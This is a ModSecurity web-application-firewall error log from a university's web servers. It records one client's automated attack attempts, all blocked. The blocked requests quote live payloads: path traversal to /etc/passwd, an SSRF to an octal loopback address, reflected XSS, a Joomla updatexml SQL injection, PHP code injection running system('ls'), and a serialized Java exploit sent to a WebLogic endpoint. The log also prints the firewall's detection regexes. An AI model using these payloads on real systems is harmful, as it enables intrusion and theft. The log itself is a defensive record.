[Tue Aug 29 11:35:16.362540 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11hMCo-f0AAAVsUboAAAAb"]
[Tue Aug 29 11:35:16.362635 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASEJZcAAAAE"]
[Tue Aug 29 11:35:16.382317 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAATzVKQAAAAx"]
[Tue Aug 29 11:35:16.385438 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUXLkwAAABM"]
[Tue Aug 29 11:35:16.386346 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASI0FsAAAAG"]
[Tue Aug 29 11:35:16.393672 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAULx@MAAABD"]
[Tue Aug 29 11:35:16.395010 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAPLwLgAAAAX"]
[Tue Aug 29 11:35:16.397324 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAUZcHMAAABO"]
[Tue Aug 29 11:35:16.400219 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAVoCAQAAAAY"]
[Tue Aug 29 11:35:16.403632 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASEJZgAAAAE"]
[Tue Aug 29 11:35:16.404498 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATPtUYAAAAM"]
[Tue Aug 29 11:35:16.404795 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATzVKUAAAAx"]
[Tue Aug 29 11:35:16.404942 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVJXmMAAAAA"]
[Tue Aug 29 11:35:17.408924 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hcCo-f0AAATOA-cAAAAH"]
[Tue Aug 29 11:35:17.419109 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11hcCo-f0AAATxvZwAAAAw"]
[Tue Aug 29 11:35:18.427404 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAASEJZsAAAAE"]
[Tue Aug 29 11:35:18.432875 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAT@Kw4AAAA2"]
[Tue Aug 29 11:35:18.461455 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hsCo-f0AAAT9PQkAAAA1"]
[Tue Aug 29 11:35:18.472269 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAAVWQBAAAAAV"]
[Tue Aug 29 11:35:18.473878 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVmuK0AAAAT"]
[Tue Aug 29 11:35:18.475282 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAARdiUkAAAAK"]
[Tue Aug 29 11:35:18.488571 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAASHh@8AAAAD"]
[Tue Aug 29 11:35:18.503441 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAATQXj0AAAAO"]
[Tue Aug 29 11:35:18.510285 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAT@KxAAAAA2"]
[Tue Aug 29 11:35:18.529642 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAVmuK8AAAAT"]
[Tue Aug 29 11:35:18.731416 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAARdiUwAAAAK"]
